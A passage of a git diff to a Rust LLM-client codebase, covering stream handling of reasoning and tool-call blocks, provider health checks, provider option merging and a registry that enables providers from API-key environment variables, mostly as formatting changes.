v.push(common); + } + } + v + } else { + COMMON_REASONING_FIELDS.to_vec() + }; + for field in &fields_to_check { + if let Some(reasoning) = delta.get(*field).and_then(|v| v.as_str()) { + if !reasoning.is_empty() { + // Open a dedicated Thinking block on first + // reasoning delta so the accumulator has a + // partial to append into (see + // StreamAccumulator::on_event). Without + // this start event the reasoning deltas + // would be dropped and the completed + // assistant message would not carry any + // ContentBlock::Thinking — which is what + // DeepSeek V4 thinking mode requires the + // client to echo back on subsequent turns. + if !thinking_open { + yield Ok(StreamEvent::ContentBlockStart { + index: THINKING_BLOCK_INDEX, + content_block: ContentBlock::Thinking { + thinking: String::new(), + signature: String::new(), + }, + }); + thinking_open = true; + } + yield Ok(StreamEvent::ReasoningDelta { + index: THINKING_BLOCK_INDEX, + reasoning: reasoning.to_string(), + }); + break; + } + } + } + } + + // Text content delta + if let Some(content) = delta.get("content").and_then(|c| c.as_str()) { + if !content.is_empty() { + // Close any open thinking block before visible text + // starts streaming, so the blocks land in order in + // the final message: [Thinking, Text, ToolUse...]. + if thinking_open { + yield Ok(StreamEvent::ContentBlockStop { + index: THINKING_BLOCK_INDEX, + }); + thinking_open = false; + } + yield Ok(StreamEvent::TextDelta { + index: 0, + text: content.to_string(), + }); + } + } + + // Tool call deltas + if let Some(tool_calls) = + delta.get("tool_calls").and_then(|t| t.as_array()) + { + // Close any open thinking block before tool calls + // start (same ordering guarantee as for text above). + if thinking_open { + yield Ok(StreamEvent::ContentBlockStop { + index: THINKING_BLOCK_INDEX, + }); + thinking_open = false; + } + for tc in tool_calls { + let tc_index = tc + .get("index") + .and_then(|v| v.as_u64()) + .unwrap_or(0) as usize; + if let Some(tc_id) = + tc.get("id").and_then(|v| v.as_str()) + { + let name = tc + .get("function") + .and_then(|f| f.get("name")) + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + let block_index = 1 + tc_index; + tool_call_buffers.insert( + block_index, + (tc_id.to_string(), name.clone(), String::new()), + ); + yield Ok(StreamEvent::ContentBlockStart { + index: block_index, + content_block: ContentBlock::ToolUse { + id: tc_id.to_string(), + name, + input: json!({}), + }, + }); + } + if let Some(args_frag) = tc + .get("function") + .and_then(|f| f.get("arguments")) + .and_then(|v| v.as_str()) + { + if !args_frag.is_empty() { + let block_index = 1 + tc_index; + if let Some((_, _, buf)) = + tool_call_buffers.get_mut(&block_index) + { + buf.push_str(args_frag); + } + yield Ok(StreamEvent::InputJsonDelta { + index: block_index, + partial_json: args_frag.to_string(), + }); + } + } + } + } + + // finish_reason + if let Some(finish_reason) = + choice.get("finish_reason").and_then(|v| v.as_str()) + { + if !finish_reason.is_empty() && finish_reason != "null" { + // Flush any still-open thinking block first so it + // is finalized into the assistant message. + if thinking_open { + yield Ok(StreamEvent::ContentBlockStop { + index: THINKING_BLOCK_INDEX, + }); + thinking_open = false; + } + yield Ok(StreamEvent::ContentBlockStop { index: 0 }); + let mut tc_indices: Vec = + tool_call_buffers.keys().cloned().collect(); + tc_indices.sort(); + for idx in tc_indices { + yield Ok(StreamEvent::ContentBlockStop { index: idx }); + } + + let stop_reason = + OpenAiProvider::map_finish_reason_pub(finish_reason); + + let usage_val = chunk_json.get("usage"); + let usage = usage_val.map(|u| OpenAiProvider::parse_usage_pub(Some(u))); + + yield Ok(StreamEvent::MessageDelta { + stop_reason: Some(stop_reason), + usage, + }); + } + } + } + } + + if message_started { + yield Ok(StreamEvent::MessageStop); + } + }; + + Ok(Box::pin(s)) + } + + async fn list_models(&self) -> Result, ProviderError> { + // Use Ollama native API when configured — provides richer metadata + // (parameter size, quantization, actual context window) than the + // generic OpenAI-compat /v1/models endpoint. + if let Some(ref ollama_host) = self.quirks.ollama_native_host { + return self.list_models_ollama_native(ollama_host).await; + } + + let url = format!("{}/models", self.base_url.trim_end_matches('/')); + let builder = self.http_client.get(&url); + let builder = self.apply_auth(builder); + let builder = self.apply_extra_headers(builder); + + let resp = builder.send().await.map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("HTTP request failed: {}", e), + status: None, + body: None, + })?; + + let status = resp.status().as_u16(); + let text = resp.text().await.map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to read response body: {}", e), + status: Some(status), + body: None, + })?; + + if !(200..300).contains(&(status as usize)) { + return Err(self.map_http_error(status, &text)); + } + + let json: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to parse models JSON: {}", e), + status: Some(status), + body: Some(text), + })?; + + let data = match json.get("data").and_then(|d| d.as_array()) { + Some(d) => d, + None => return Ok(vec![]), + }; + + let provider_id = self.id.clone(); + let models: Vec = data + .iter() + .filter_map(|m| { + let id = m.get("id").and_then(|v| v.as_str())?; + Some(ModelInfo { + id: ModelId::new(id), + provider_id: provider_id.clone(), + name: id.to_string(), + context_window: match id { + "gpt-5" | "gpt-5.4" | "gpt-5.2" | "gpt-5-mini" | "gpt-5-nano" + | "gpt-5-chat-latest" | "gpt-5.2-codex" | "gpt-5.1-codex" + | "gpt-5.1-codex-mini" | "gpt-5.1-codex-max" => 400_000, + "o3" | "o3-mini" | "o4-mini" => 200_000, + _ => 128_000, + }, + max_output_tokens: 16_384, + }) + }) + .collect(); + + Ok(models) + } + + async fn health_check(&self) -> Result { + // Providers that need an API key but have none configured are + // immediately unavailable without making a network call. + if self.has_no_key() { + // Providers that never require an API key (Ollama, LM Studio, + // llama.cpp) should always proceed to the live health probe, + // regardless of whether the base URL is local or remote. This + // allows remote/VPS-hosted instances to be used without a key. + // + // For all other providers a missing key means the env var was + // absent or empty; report that without making a network call, + // distinguishing only by URL when the quirk is not set. + if !self.quirks.no_api_key_required { + let is_local = self.base_url.contains("localhost") + || self.base_url.contains("127.0.0.1") + || self.base_url.contains("::1"); + + if !is_local { + return Ok(ProviderStatus::Unavailable { + reason: "No API key configured".to_string(), + }); + } + } + } + + // For Ollama, prefer the native `/api/tags` endpoint over the + // OpenAI-compatible `/v1/models` one — older Ollama versions do not + // expose `/v1/models` and would return 404. + let url = if let Some(ref host) = self.quirks.ollama_native_host { + format!("{}/api/tags", host.trim_end_matches('/')) + } else { + format!("{}/models", self.base_url.trim_end_matches('/')) + }; + let builder = self.http_client.get(&url); + let builder = self.apply_auth(builder); + let builder = self.apply_extra_headers(builder); + + match builder.send().await { + Ok(r) if r.status().is_success() => Ok(ProviderStatus::Healthy), + Ok(r) => Ok(ProviderStatus::Unavailable { + reason: format!("models endpoint returned {}", r.status()), + }), + Err(e) => Ok(ProviderStatus::Unavailable { + reason: e.to_string(), + }), + } + } + + fn capabilities(&self) -> ProviderCapabilities { + ProviderCapabilities { + streaming: true, + tool_calling: true, + thinking: self.quirks.reasoning_field.is_some(), + image_input: true, + pdf_input: false, + audio_input: false, + video_input: false, + caching: false, + structured_output: true, + system_prompt_style: SystemPromptStyle::SystemMessage, + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use serde_json::json; + + #[test] + fn mistral_tool_ids_match_opencode_style() { + let provider = OpenAiCompatProvider::new("mistral", "Mistral", "https://example.com") + .with_quirks(ProviderQuirks { + tool_id_max_len: Some(9), + tool_id_alphanumeric_only: true, + ..Default::default() + }); + + assert_eq!(provider.scrub_tool_id("call-123456789abc"), "call12345"); + assert_eq!(provider.scrub_tool_id("x"), "x00000000"); + } + + #[test] + fn fix_tool_user_sequence_inserts_done_between_tool_and_user() { + let mut messages = vec![ + json!({"role": "tool", "tool_call_id": "call_1", "content": "ok"}), + json!({"role": "user", "content": "continue"}), + ]; + + OpenAiCompatProvider::apply_fix_tool_user_sequence(&mut messages); + + assert_eq!(messages.len(), 3); + assert_eq!(messages[1]["role"], json!("assistant")); + assert_eq!(messages[1]["content"], json!("Done.")); + } +} diff --git a/src-rust/crates/api/src/providers/openai_compat_providers.rs b/src-rust/crates/api/src/providers/openai_compat_providers.rs index 1d2cd33..3f28534 100644 --- a/src-rust/crates/api/src/providers/openai_compat_providers.rs +++ b/src-rust/crates/api/src/providers/openai_compat_providers.rs @@ -112,12 +112,8 @@ pub fn llama_cpp() -> OpenAiCompatProvider { pub fn custom_openai_with_url(base_url: impl Into) -> OpenAiCompatProvider { let key = std::env::var("CUSTOM_OPENAI_API_KEY").unwrap_or_default(); - OpenAiCompatProvider::new( - "custom-openai", - "Custom OpenAI-Compatible", - base_url.into(), - ) - .with_api_key(key) + OpenAiCompatProvider::new("custom-openai", "Custom OpenAI-Compatible", base_url.into()) + .with_api_key(key) } /// Custom OpenAI-compatible provider supplied by the user. @@ -525,16 +521,12 @@ pub fn opencode_zen() -> OpenAiCompatProvider { /// Reads `CROF_API_KEY` for authentication. pub fn crof() -> OpenAiCompatProvider { let key = std::env::var("CROF_API_KEY").unwrap_or_default(); - OpenAiCompatProvider::new( - ProviderId::CROF, - "Crof.ai", - "https://api.crof.ai/v1", - ) - .with_api_key(key) - .with_quirks(ProviderQuirks { - include_usage_in_stream: true, - ..Default::default() - }) + OpenAiCompatProvider::new(ProviderId::CROF, "Crof.ai", "https://api.crof.ai/v1") + .with_api_key(key) + .with_quirks(ProviderQuirks { + include_usage_in_stream: true, + ..Default::default() + }) } /// Synthetic.dev — OpenAI-compatible endpoint with curated model selection. diff --git a/src-rust/crates/api/src/providers/request_options.rs b/src-rust/crates/api/src/providers/request_options.rs index b37f2be..d49bc46 100644 --- a/src-rust/crates/api/src/providers/request_options.rs +++ b/src-rust/crates/api/src/providers/request_options.rs @@ -1,185 +1,189 @@ -use serde_json::{Map, Value}; - -fn merge_maps(target: &mut Map, source: &Map) { - for (key, value) in source { - match (target.get_mut(key), value) { - (Some(Value::Object(target_obj)), Value::Object(source_obj)) => { - merge_maps(target_obj, source_obj); - } - _ => { - target.insert(key.clone(), value.clone()); - } - } - } -} - -pub(crate) fn merge_root_options(body: &mut Value, provider_options: &Value) { - let Some(body_obj) = body.as_object_mut() else { - return; - }; - let Some(options_obj) = provider_options.as_object() else { - return; - }; - - merge_maps(body_obj, options_obj); -} - -pub(crate) fn merge_openai_compatible_options(body: &mut Value, provider_options: &Value) { - let Some(options_obj) = provider_options.as_object() else { - return; - }; - - for (key, value) in options_obj { - match key.as_str() { - "reasoningEffort" => body["reasoning_effort"] = value.clone(), - "textVerbosity" => body["verbosity"] = value.clone(), - _ => body[key] = value.clone(), - } - } -} - -pub(crate) fn merge_google_options(body: &mut Value, provider_options: &Value) { - const GENERATION_CONFIG_KEYS: &[&str] = &[ - "candidateCount", - "frequencyPenalty", - "logprobs", - "maxOutputTokens", - "mediaResolution", - "presencePenalty", - "responseLogprobs", - "responseMimeType", - "responseModalities", - "responseSchema", - "seed", - "speechConfig", - "stopSequences", - "temperature", - "thinkingConfig", - "topK", - "topP", - ]; - - let Some(body_obj) = body.as_object_mut() else { - return; - }; - let Some(options_obj) = provider_options.as_object() else { - return; - }; - - let generation_config = body_obj - .entry("generationConfig".to_string()) - .or_insert_with(|| Value::Object(Map::new())); - let generation_config_obj = generation_config - .as_object_mut() - .expect("generationConfig must be an object"); - let mut root_entries: Vec<(String, Value)> = Vec::new(); - - for (key, value) in options_obj { - if GENERATION_CONFIG_KEYS.contains(&key.as_str()) { - generation_config_obj.insert(key.clone(), value.clone()); - } else { - root_entries.push((key.clone(), value.clone())); - } - } - - for (key, value) in root_entries { - body_obj.insert(key, value); - } -} - -pub(crate) fn merge_bedrock_options(body: &mut Value, provider_options: &Value) { - let Some(body_obj) = body.as_object_mut() else { - return; - }; - let Some(options_obj) = provider_options.as_object() else { - return; - }; - - for (key, value) in options_obj { - match key.as_str() { - "inferenceConfig" | "toolConfig" | "reasoningConfig" | "additionalModelRequestFields" => { - match (body_obj.get_mut(key), value) { - (Some(Value::Object(target_obj)), Value::Object(source_obj)) => { - merge_maps(target_obj, source_obj); - } - _ => { - body_obj.insert(key.clone(), value.clone()); - } - } - } - _ => { - body_obj.insert(key.clone(), value.clone()); - } - } - } -} - -#[cfg(test)] -mod tests { - use super::*; - use serde_json::json; - - #[test] - fn merge_openai_compatible_maps_reasoning_fields() { - let mut body = json!({}); - merge_openai_compatible_options( - &mut body, - &json!({ - "reasoningEffort": "high", - "textVerbosity": "low", - "store": false, - }), - ); - - assert_eq!(body["reasoning_effort"], json!("high")); - assert_eq!(body["verbosity"], json!("low")); - assert_eq!(body["store"], json!(false)); - } - - #[test] - fn merge_google_places_thinking_config_under_generation_config() { - let mut body = json!({ - "generationConfig": { - "maxOutputTokens": 1024 - } - }); - merge_google_options( - &mut body, - &json!({ - "thinkingConfig": { - "includeThoughts": true, - "thinkingLevel": "high" - }, - "cachedContent": "abc" - }), - ); - - assert_eq!(body["generationConfig"]["thinkingConfig"]["thinkingLevel"], json!("high")); - assert_eq!(body["cachedContent"], json!("abc")); - } - - #[test] - fn merge_bedrock_merges_nested_configs() { - let mut body = json!({ - "toolConfig": { - "tools": [{"toolSpec": {"name": "a"}}] - } - }); - merge_bedrock_options( - &mut body, - &json!({ - "toolConfig": { - "toolChoice": {"auto": {}} - }, - "reasoningConfig": { - "type": "enabled", - "budgetTokens": 1000 - } - }), - ); - - assert!(body["toolConfig"]["tools"].is_array()); - assert_eq!(body["toolConfig"]["toolChoice"]["auto"], json!({})); - assert_eq!(body["reasoningConfig"]["budgetTokens"], json!(1000)); - } -} +use serde_json::{Map, Value}; + +fn merge_maps(target: &mut Map, source: &Map) { + for (key, value) in source { + match (target.get_mut(key), value) { + (Some(Value::Object(target_obj)), Value::Object(source_obj)) => { + merge_maps(target_obj, source_obj); + } + _ => { + target.insert(key.clone(), value.clone()); + } + } + } +} + +pub(crate) fn merge_root_options(body: &mut Value, provider_options: &Value) { + let Some(body_obj) = body.as_object_mut() else { + return; + }; + let Some(options_obj) = provider_options.as_object() else { + return; + }; + + merge_maps(body_obj, options_obj); +} + +pub(crate) fn merge_openai_compatible_options(body: &mut Value, provider_options: &Value) { + let Some(options_obj) = provider_options.as_object() else { + return; + }; + + for (key, value) in options_obj { + match key.as_str() { + "reasoningEffort" => body["reasoning_effort"] = value.clone(), + "textVerbosity" => body["verbosity"] = value.clone(), + _ => body[key] = value.clone(), + } + } +} + +pub(crate) fn merge_google_options(body: &mut Value, provider_options: &Value) { + const GENERATION_CONFIG_KEYS: &[&str] = &[ + "candidateCount", + "frequencyPenalty", + "logprobs", + "maxOutputTokens", + "mediaResolution", + "presencePenalty", + "responseLogprobs", + "responseMimeType", + "responseModalities", + "responseSchema", + "seed", + "speechConfig", + "stopSequences", + "temperature", + "thinkingConfig", + "topK", + "topP", + ]; + + let Some(body_obj) = body.as_object_mut() else { + return; + }; + let Some(options_obj) = provider_options.as_object() else { + return; + }; + + let generation_config = body_obj + .entry("generationConfig".to_string()) + .or_insert_with(|| Value::Object(Map::new())); + let generation_config_obj = generation_config + .as_object_mut() + .expect("generationConfig must be an object"); + let mut root_entries: Vec<(String, Value)> = Vec::new(); + + for (key, value) in options_obj { + if GENERATION_CONFIG_KEYS.contains(&key.as_str()) { + generation_config_obj.insert(key.clone(), value.clone()); + } else { + root_entries.push((key.clone(), value.clone())); + } + } + + for (key, value) in root_entries { + body_obj.insert(key, value); + } +} + +pub(crate) fn merge_bedrock_options(body: &mut Value, provider_options: &Value) { + let Some(body_obj) = body.as_object_mut() else { + return; + }; + let Some(options_obj) = provider_options.as_object() else { + return; + }; + + for (key, value) in options_obj { + match key.as_str() { + "inferenceConfig" + | "toolConfig" + | "reasoningConfig" + | "additionalModelRequestFields" => match (body_obj.get_mut(key), value) { + (Some(Value::Object(target_obj)), Value::Object(source_obj)) => { + merge_maps(target_obj, source_obj); + } + _ => { + body_obj.insert(key.clone(), value.clone()); + } + }, + _ => { + body_obj.insert(key.clone(), value.clone()); + } + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use serde_json::json; + + #[test] + fn merge_openai_compatible_maps_reasoning_fields() { + let mut body = json!({}); + merge_openai_compatible_options( + &mut body, + &json!({ + "reasoningEffort": "high", + "textVerbosity": "low", + "store": false, + }), + ); + + assert_eq!(body["reasoning_effort"], json!("high")); + assert_eq!(body["verbosity"], json!("low")); + assert_eq!(body["store"], json!(false)); + } + + #[test] + fn merge_google_places_thinking_config_under_generation_config() { + let mut body = json!({ + "generationConfig": { + "maxOutputTokens": 1024 + } + }); + merge_google_options( + &mut body, + &json!({ + "thinkingConfig": { + "includeThoughts": true, + "thinkingLevel": "high" + }, + "cachedContent": "abc" + }), + ); + + assert_eq!( + body["generationConfig"]["thinkingConfig"]["thinkingLevel"], + json!("high") + ); + assert_eq!(body["cachedContent"], json!("abc")); + } + + #[test] + fn merge_bedrock_merges_nested_configs() { + let mut body = json!({ + "toolConfig": { + "tools": [{"toolSpec": {"name": "a"}}] + } + }); + merge_bedrock_options( + &mut body, + &json!({ + "toolConfig": { + "toolChoice": {"auto": {}} + }, + "reasoningConfig": { + "type": "enabled", + "budgetTokens": 1000 + } + }), + ); + + assert!(body["toolConfig"]["tools"].is_array()); + assert_eq!(body["toolConfig"]["toolChoice"]["auto"], json!({})); + assert_eq!(body["reasoningConfig"]["budgetTokens"], json!(1000)); + } +} diff --git a/src-rust/crates/api/src/registry.rs b/src-rust/crates/api/src/registry.rs index f6cfeef..8c2ae3f 100644 --- a/src-rust/crates/api/src/registry.rs +++ b/src-rust/crates/api/src/registry.rs @@ -13,8 +13,8 @@ use crate::provider::LlmProvider; use crate::provider_types::ProviderStatus; use crate::providers::{ AnthropicProvider, AzureProvider, BedrockProvider, CodexProvider, CohereProvider, - CopilotProvider, FreeEntry, FreeProvider, FREE_CATALOG, GoogleProvider, MinimaxProvider, - OpenAiProvider, + CopilotProvider, FreeEntry, FreeProvider, GoogleProvider, MinimaxProvider, OpenAiProvider, + FREE_CATALOG, }; fn normalize_openai_compat_base(override_base: &str) -> String { @@ -64,9 +64,10 @@ fn provider_from_key(provider_id: &str, key: String) -> Option Some(Arc::new(AnthropicProvider::from_config( - ClientConfig { api_key: key, ..Default::default() }, - ))), + "anthropic" => Some(Arc::new(AnthropicProvider::from_config(ClientConfig { + api_key: key, + ..Default::default() + }))), "minimax" => Some(Arc::new(MinimaxProvider::new(key))), "openai" => Some(Arc::new(OpenAiProvider::new(key))), "google" => Some(Arc::new(GoogleProvider::new(key))), @@ -157,9 +158,7 @@ pub fn provider_from_config( Some(Arc::new(provider)) } "google" => api_key.map(|key| Arc::new(GoogleProvider::new(key)) as Arc), - "minimax" => { - api_key.map(|key| Arc::new(MinimaxProvider::new(key)) as Arc) - } + "minimax" => api_key.map(|key| Arc::new(MinimaxProvider::new(key)) as Arc), "azure" => { let resource_name = provider_cfg .and_then(|provider| provider.options.get("resource_name")) @@ -173,9 +172,9 @@ pub fn provider_from_config( }); match (resource_name, api_key) { - (Some(resource_name), Some(key)) => Some( - Arc::new(AzureProvider::new(resource_name, key)) as Arc - ), + (Some(resource_name), Some(key)) => { + Some(Arc::new(AzureProvider::new(resource_name, key)) as Arc) + } _ => None, } } @@ -367,12 +366,12 @@ impl ProviderRegistry { let mut registry = Self::from_environment_with_auth_store(anthropic_config); let active_provider = config.selected_provider_id(); - let mut configured_provider_ids: Vec = config - .provider_configs - .keys() - .cloned() - .collect(); - if configured_provider_ids.iter().all(|id| id != active_provider) { + let mut configured_provider_ids: Vec = + config.provider_configs.keys().cloned().collect(); + if configured_provider_ids + .iter() + .all(|id| id != active_provider) + { configured_provider_ids.push(active_provider.to_string()); } @@ -494,7 +493,7 @@ impl ProviderRegistry { // env vars. let auth_store = claurst_core::AuthStore::load(); - for (provider_id, _cred) in &auth_store.credentials { + for provider_id in auth_store.credentials.keys() { let pid = claurst_core::ProviderId::new(provider_id.as_str()); // Skip if already registered from env vars. if registry.get(&pid).is_some() { @@ -534,95 +533,185 @@ impl ProviderRegistry { self.register(Arc::new(p::llama_cpp())); // Remote providers — only register when an API key is present. - if std::env::var("DEEPSEEK_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("DEEPSEEK_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::deepseek())); } - if std::env::var("GROQ_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("GROQ_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::groq())); } - if std::env::var("XAI_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("XAI_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::xai())); } - if std::env::var("OPENROUTER_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("OPENROUTER_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::openrouter())); } - if std::env::var("TOGETHER_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("TOGETHER_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::together_ai())); } - if std::env::var("PERPLEXITY_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("PERPLEXITY_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::perplexity())); } - if std::env::var("CEREBRAS_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("CEREBRAS_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::cerebras())); } - if std::env::var("DEEPINFRA_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("DEEPINFRA_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::deepinfra())); } - if std::env::var("VENICE_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("VENICE_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::venice())); } - if std::env::var("DASHSCOPE_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("DASHSCOPE_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::qwen())); } - if std::env::var("MISTRAL_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("MISTRAL_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::mistral())); } - if std::env::var("SAMBANOVA_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("SAMBANOVA_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::sambanova())); } - if std::env::var("HF_TOKEN").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("HF_TOKEN") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::huggingface())); } - if std::env::var("MINIMAX_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("MINIMAX_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { let key = std::env::var("MINIMAX_API_KEY").unwrap_or_default(); self.register(Arc::new(MinimaxProvider::new(key))); } - if std::env::var("NVIDIA_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("NVIDIA_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::nvidia())); } - if std::env::var("SILICONFLOW_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("SILICONFLOW_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::siliconflow())); } - if std::env::var("MOONSHOT_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("MOONSHOT_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::moonshot())); } - if std::env::var("ZHIPU_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("ZHIPU_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::zhipu())); } - if std::env::var("ZAI_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("ZAI_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::zai())); } - if std::env::var("NEBIUS_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("NEBIUS_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::nebius())); } - if std::env::var("NOVITA_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("NOVITA_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::novita())); } - if std::env::var("OVHCLOUD_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("OVHCLOUD_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::ovhcloud())); } - if std::env::var("SCALEWAY_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("SCALEWAY_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::scaleway())); } - if std::env::var("VULTR_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("VULTR_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::vultr_ai())); } - if std::env::var("BASETEN_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("BASETEN_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::baseten())); } - if std::env::var("FRIENDLI_TOKEN").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("FRIENDLI_TOKEN") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::friendli())); } - if std::env::var("UPSTAGE_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("UPSTAGE_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::upstage())); } - if std::env::var("STEPFUN_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("STEPFUN_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::stepfun())); } - if std::env::var("FIREWORKS_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("FIREWORKS_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::fireworks())); } - if std::env::var("OPENCODE_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) { + if std::env::var("OPENCODE_API_KEY") + .map(|v| !v.is_empty()) + .unwrap_or(false) + { self.register(Arc::new(p::opencode_go())); } self diff --git a/src-rust/crates/api/src/stream_parser.rs b/src-rust/crates/api/src/stream_parser.rs index b3c546c..b840c2f 100644 --- a/src-rust/crates/api/src/stream_parser.rs +++ b/src-rust/crates/api/src/stream_parser.rs @@ -32,10 +32,7 @@ pub trait StreamParser: Send + Sync { async fn parse( &self, response: reqwest::Response, - ) -> Result< - Pin> + Send>>, - ProviderError, - >; + ) -> Result> + Send>>, ProviderError>; } // --------------------------------------------------------------------------- @@ -64,10 +61,8 @@ impl StreamParser for SseStreamParser { async fn parse( &self, _response: reqwest::Response, - ) -> Result< - Pin> + Send>>, - ProviderError, - > { + ) -> Result> + Send>>, ProviderError> + { // Will be implemented in Phase 2A. Err(ProviderError::Other { provider: ProviderId::new("unknown"), @@ -104,10 +99,8 @@ impl StreamParser for JsonLinesStreamParser { async fn parse( &self, _response: reqwest::Response, - ) -> Result< - Pin> + Send>>, - ProviderError, - > { + ) -> Result> + Send>>, ProviderError> + { // Will be implemented in Phase 2A. Err(ProviderError::Other { provider: ProviderId::new("unknown"), diff --git a/src-rust/crates/api/src/transform.rs b/src-rust/crates/api/src/transform.rs index 9c22ef9..23b48e2 100644 --- a/src-rust/crates/api/src/transform.rs +++ b/src-rust/crates/api/src/transform.rs @@ -5,9 +5,9 @@ // in both directions (outbound request serialisation and inbound response // deserialisation). +use crate::provider::ModelInfo; use crate::provider_error::ProviderError; use crate::provider_types::{ProviderRequest, ProviderResponse}; -use crate::provider::ModelInfo; // --------------------------------------------------------------------------- // MessageTransformer @@ -32,7 +32,7 @@ pub trait MessageTransformer: Send + Sync { /// Deserialize a provider-specific JSON response body into a /// `ProviderResponse`. - fn from_provider( + fn parse_provider_response( &self, response: &serde_json::Value, ) -> Result; diff --git a/src-rust/crates/api/src/transformers/anthropic.rs b/src-rust/crates/api/src/transformers/anthropic.rs index 6ace796..612e91e 100644 --- a/src-rust/crates/api/src/transformers/anthropic.rs +++ b/src-rust/crates/api/src/transformers/anthropic.rs @@ -1,245 +1,243 @@ -// transformers/anthropic.rs — Identity transformer for the Anthropic wire -// format (ProviderRequest → Anthropic JSON body and back). -// -// The Anthropic provider is the native/internal format for Coven Code, so -// `to_provider` serialises the request fields directly to the Anthropic v1 -// messages schema and `from_provider` parses the standard Anthropic response. - -use crate::provider::ModelInfo; -use crate::provider_error::ProviderError; -use crate::provider_types::{ProviderRequest, ProviderResponse, StopReason}; -use crate::transform::MessageTransformer; -use crate::types::{ApiMessage, ApiToolDefinition}; -use crate::providers::message_normalization::normalize_anthropic_messages; -use claurst_core::provider_id::ProviderId; -use claurst_core::types::{ContentBlock, UsageInfo}; - -// --------------------------------------------------------------------------- -// AnthropicTransformer -// --------------------------------------------------------------------------- - -/// Identity transformer: converts `ProviderRequest` to the Anthropic v1 -/// messages JSON body, and parses the Anthropic JSON response into a -/// `ProviderResponse`. -/// -/// This mirrors the logic in `AnthropicProvider::build_request` and the -/// `create_message` accumulation code, but works purely as a JSON↔type -/// mapping without owning an HTTP client. -pub struct AnthropicTransformer; - -impl MessageTransformer for AnthropicTransformer { - fn to_provider( - &self, - request: 